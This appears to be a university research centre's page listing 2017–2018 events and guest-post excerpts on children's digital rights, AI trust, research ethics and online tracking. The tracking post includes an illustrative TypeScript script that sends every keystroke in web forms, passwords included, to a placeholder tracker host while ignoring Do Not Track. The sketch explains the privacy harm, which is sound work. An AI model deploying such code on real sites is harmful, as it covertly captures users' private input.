
Annual Conference 2017 Resources

The Information Law and Policy Centre held its third annual conference on 17 November 2017. The conference’s theme was: ‘Children and Digital Rights: Regulating Freedoms and Safeguards’.

The conference brought together regulators, practitioners, civil society and leading academic experts to examine the key legal frameworks and policies being used and developed to safeguard children’s digital freedoms and rights. These frameworks include the UN Convention on the Rights of the Child, the related provisions (such as consent, transparency and profiling) under the UK Digital Charter, and the Data Protection Bill, which will implement the EU General Data Protection Regulation.

The following resources are available online:

  • Full programme
  • Presentation: ILPC Annual Conference, Baroness Beeban Kidron (video)
  • Presentation: ILPC Annual Conference, Anna Morgan (video)
  • Presentation: ILPC Annual Conference, Lisa Atkinson (video)
  • Presentation: ILPC Annual Conference, Rachael Bishop (video)

Emotion detection, personalisation and autonomous decision-making online

This event took place at the Information Law and Policy Centre at the Institute of Advanced Legal Studies on Monday, 5 February 2018.

Date
05 Feb 2018, 17:30 to 05 Feb 2018, 19:30
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR

Speaker: Damian Clifford, KU Leuven Centre for IT and IP Law

Panel Discussants:

Dr Edina Harbinja, Senior Lecturer in Law, University of Hertfordshire.

Hamed Haddadi, Senior Lecturer (Associate Professor), Deputy Director of Research in the Dyson School of Design Engineering, and an Academic Fellow of the Data Science Institute in the Faculty of Engineering, Imperial College London.

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law and Policy Centre, Institute of Advanced Legal Studies

Description:

Emotions play a key role in decision-making. Technological advances now render emotions detectable in real time. Building on the granular insights provided by big data and the emergence of ‘empathic media’, such developments allow commercial entities to move beyond behavioural targeting in advertising to the personalisation of services, interfaces and other consumer-facing interactions, based on personal preferences, biases and emotional insights gleaned from the tracking and profiling of online activity.


Personal Data as an Asset: Design and Incentive Alignments in a Personal Data Economy

Registration open

Date
19 Feb 2018, 17:30 to 19 Feb 2018, 19:30
Institute
Institute of Advanced Legal Studies
Venue
Institute of Advanced Legal Studies, 17 Russell Square, London WC1B 5DR


Speaker: Professor Irene Ng, Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick

Panel Discussants: Perry Keller, King’s College London, and John Sheridan, The National Archives

Chair: Dr Nora Ni Loideain, Director and Lecturer in Law, Information Law & Policy Centre, Institute of Advanced Legal Studies

Description:

Despite the World Economic Forum’s 2011 report identifying personal data as a new asset class, the cost of transacting on personal data is becoming increasingly high, owing to regulatory risks, societal disapproval, legal complexity and privacy concerns.

Professor Irene Ng contends that this is because personal data as an asset is currently controlled by organisations. Although personal data is a co-produced asset, the individual has not had the technological capability to control and process his or her own data – or, indeed, data in general. Hence, legal and economic structures have been created only around organisation-controlled personal data (OPD).

This presentation will argue that person-controlled personal data (PPD), architected technologically, legally and economically so that the individual owns a personal micro-server and therefore has full rights to the data within, much like owning a PC or a smartphone, is potentially a route to reducing transaction costs and innovating in the personal data economy. I will present the design and incentive alignments of stakeholders on the HAT hub-of-all-things platform (https://hubofallthings.com).

Professor Irene Ng is the Director of the International Institute for Product and Service Innovation and the Professor of Marketing and Service Systems at WMG, University of Warwick. She is also the Chairman of the Hub-of-all-Things (HAT) Foundation Group (http://hubofallthings.com). A market design economist, Professor Ng advises large organisations, startups and governments on the design of markets and on economic and business models in the digital economy. Personal website: http://ireneng.com

John Sheridan is the Digital Director at The National Archives, with overall responsibility for the organisation’s digital services and digital archiving capability. His role is to provide strategic direction, developing the people and capability needed for The National Archives to become a disruptive digital archive. John’s academic background is in mathematics and information technology, with a degree in Mathematics and Computer Science from the University of Southampton and a Master’s degree in Information Technology from the University of Liverpool. Prior to his current role, John was the Head of Legislation Services at The National Archives, where he led the team responsible for creating legislation.gov.uk as well as overseeing the operation of the official Gazette. John recently led, as Principal Investigator, an Arts and Humanities Research Council funded project, ‘Big Data for Law’, exploring the application of data analytics to the statute book, which won the Halsbury Legal Award for Innovation. John has a strong interest in web and data standards and is a former co-chair of the W3C e-Government Interest Group. He serves on the UK Government’s Data Leaders group and the Open Standards Board, which sets data standards for use across government. John was an early pioneer of open data and remains active in that community.

Perry Keller is Reader in Media and Information Law at the Dickson Poon School of Law, King’s College London, where he teaches and researches issues relating to freedom of expression, privacy and data protection. He is the author of European and International Media Law. Mr Keller’s current research concerns the transparency of urban life as a consequence of governmental and commercial surveillance, and the particular challenges this brings for liberal democracies. He also has longstanding connections with China, having previously studied or worked in Beijing, Nanjing, Taipei and Hong Kong. His current research interests regarding law and regulation in China concern the development of a divergent Chinese model for securing data privacy and security.

A wine reception will follow this seminar.


Admission FREE but advance booking is required.

AI trust and AI fears: A media debate that could divide society


In this guest post, Dr Vyacheslav Polonski, Researcher, University of Oxford, examines the key question of trust in, and fear of, AI.

We are at a tipping point of a new digital divide. While some embrace AI, many people will always prefer human experts even when they’re wrong.

Unless you live under a rock, you probably have been inundated with recent news on machine learning and artificial intelligence (AI). With all the recent breakthroughs, it almost seems like AI can already predict the future. Police forces are using it to map when and where crime is likely to occur. Doctors can use it to predict when a patient is most likely to have a heart attack or stroke. Researchers are even trying to give AI imagination so it can plan for unexpected consequences.

Of course, many decisions in our lives require a good forecast, and AI agents are almost always better at forecasting than their human counterparts. Yet for all these technological advances, we still seem to deeply lack confidence in AI predictions. Recent cases show that people don’t like relying on AI and prefer to trust human experts, even if these experts are wrong.

If we want AI to really benefit people, we need to find a way to get people to trust it. To do that, we need to understand why people are so reluctant to trust AI in the first place.


A Prediction about Predictions

In this guest post, Marion Oswald offers her homage to Yes Minister and, in that tradition, smuggles in some pertinent observations on AI fears. This post first appeared on the SCL website’s blog as part of Laurence Eastham’s Predictions 2018 series, and also appears in the December/January issue of Computers & Law.


How websites watch your every move and ignore privacy settings


In this guest post, Yijun Yu, Senior Lecturer, Department of Computing and Communications, The Open University examines the world’s top websites and their routine tracking of a user’s every keystroke, mouse movement and input into a web form – even if it’s later deleted.

Hundreds of the world’s top websites routinely track a user’s every keystroke, mouse movement and input into a web form – even if the form is never submitted or is later abandoned – according to the results of a study from researchers at Princeton University.

And there’s a nasty side-effect: personally identifiable data, such as medical information, passwords and credit card details, could be revealed when users surf the web – without them knowing that companies are monitoring their browsing behaviour. It’s a situation that should alarm anyone who cares about their privacy.

The Princeton researchers found it was difficult to redact personally identifiable information from browsing behaviour records – even, in some instances, when users have switched on privacy settings such as Do Not Track.
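To make the mechanism concrete, below is a minimal sketch, in TypeScript, of how a session-replay-style script can observe form input before it is ever submitted. The collection endpoint, payload fields and function names are hypothetical and for illustration only; this is not any vendor’s actual code.

```typescript
// Minimal sketch of a session-replay-style recorder (hypothetical code).
// The "input" event fires on every keystroke, so the script sees each
// intermediate value of a field even if the form is never submitted.

function attachRecorder(form: HTMLFormElement): void {
  form.addEventListener("input", (event: Event) => {
    const field = event.target as HTMLInputElement;
    void fetch("https://tracker.example.com/collect", { // hypothetical endpoint
      method: "POST",
      keepalive: true, // lets the request outlive page unload
      body: JSON.stringify({
        page: location.href,
        field: field.name,
        value: field.value, // may capture passwords or card numbers mid-typing
        ts: Date.now(),
      }),
    });
  });
}

// Mouse movements can be sampled the same way and batched for upload.
document.addEventListener("mousemove", (e: MouseEvent) => {
  // e.g. buffer { x: e.clientX, y: e.clientY } and flush periodically
});

// Nothing forces a script to honour the advisory Do Not Track signal
// (navigator.doNotTrack); collection like this can simply ignore it.
document.querySelectorAll("form").forEach((f) => attachRecorder(f));
```

Because each keystroke is transmitted as it happens, deleting text before submitting does not undo what has already been sent, and the Do Not Track setting offers no technical protection.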


Guilty until proven innocent? How a legal loophole is being used to name and shame children

In this guest post, Faith Gordon, University of Westminster, explores how, under UK law, a child’s anonymity is not entirely guaranteed. Faith is speaking at the Information Law and Policy Centre’s annual conference – Children and Digital Rights: Regulating Freedoms and Safeguards – this Friday, 17 November.

Under the 1948 Universal Declaration of Human Rights, each individual is presumed innocent until proven guilty. A big part of protecting this principle is ensuring that public opinion is not biased against someone who is about to be tried in the courts. Minors are particularly vulnerable in this situation and need all the protection that can legally be offered. So when you read stories about cases involving children, they are often accompanied by the line that the accused cannot be named for legal reasons.

However, a loophole exists: a minor can be named before being formally charged. And, as we all know in this digital age, being named has consequences – details or images of the child, once shared, are permanent. While the Data Protection Bill gives children the strongest version of the right to be forgotten, children and young people know that once their images and posts are screenshotted, they have little or no control over how they are used and who has access to them.


Ethical issues in research using datasets of illicit origin

In this guest post, Dr Daniel R. Thomas, University of Cambridge, reviews the ethical issues raised by research using datasets of illicit origin. This post first appeared on ‘Light Blue Touchpaper’, the blog written by researchers in the Security Group at the University of Cambridge Computer Laboratory.

On Friday at the Internet Measurement Conference (IMC) I presented our paper “Ethical issues in research using datasets of illicit origin” by Daniel R. Thomas, Sergio Pastrana, Alice Hutchings, Richard Clayton, and Alastair R. Beresford. We conducted this research after thinking about some of these issues in the context of our previous work on UDP reflection DDoS attacks.

Data of illicit origin is data obtained by illicit means, such as exploiting a vulnerability or an unauthorised disclosure; in our previous work, this was leaked databases from booter services. We analysed existing guidance on ethics, and papers that used data of illicit origin, to see which issues researchers are encouraged to discuss and which issues they actually discussed. We find wide variation in current practice. We encourage researchers using data of illicit origin to include an ethics section in their paper, explaining why the work was ethical, so that the research community can learn from it.

At present, in many cases, the positive benefits as well as the potential harms of research remain entirely unidentified. Few papers record explicit Research Ethics Board (REB) (aka IRB/Ethics Committee) approval for the activity described, and the justifications given for exemption from REB approval suggest deficiencies in the REB process. It is also important to focus on the ‘human participants’ of research rather than the narrower ‘human subjects’ definition, as not all the humans that might be harmed by research are its direct subjects.

The paper and the slides are available.

Too much information? More than 80% of children have an online presence by the age of two


In this guest post, Claire Bessant, Northumbria University, Newcastle, looks into the phenomenon of ‘sharenting’. Her article is relevant to the Information Law and Policy Centre’s annual conference coming up in November – Children and Digital Rights: Regulating Freedoms and Safeguards.

A toddler with birthday cake smeared across his face grins delightedly at his mother. Minutes later, the image appears on Facebook. A not uncommon scenario: 42% of UK parents share photos of their children online, with half of these parents sharing photos at least once a month.

Welcome to the world of “sharenting” – where more than 80% of children are said to have an online presence by the age of two. This is a world where the average parent shares almost 1,500 images of their child online before their fifth birthday.

But while a recent report from Ofcom confirms that many parents do share images of their children online, it also indicates that more than half (56%) of parents don’t. Most of these non-sharenting parents (87%) actively choose not to share in order to protect their children’s private lives.
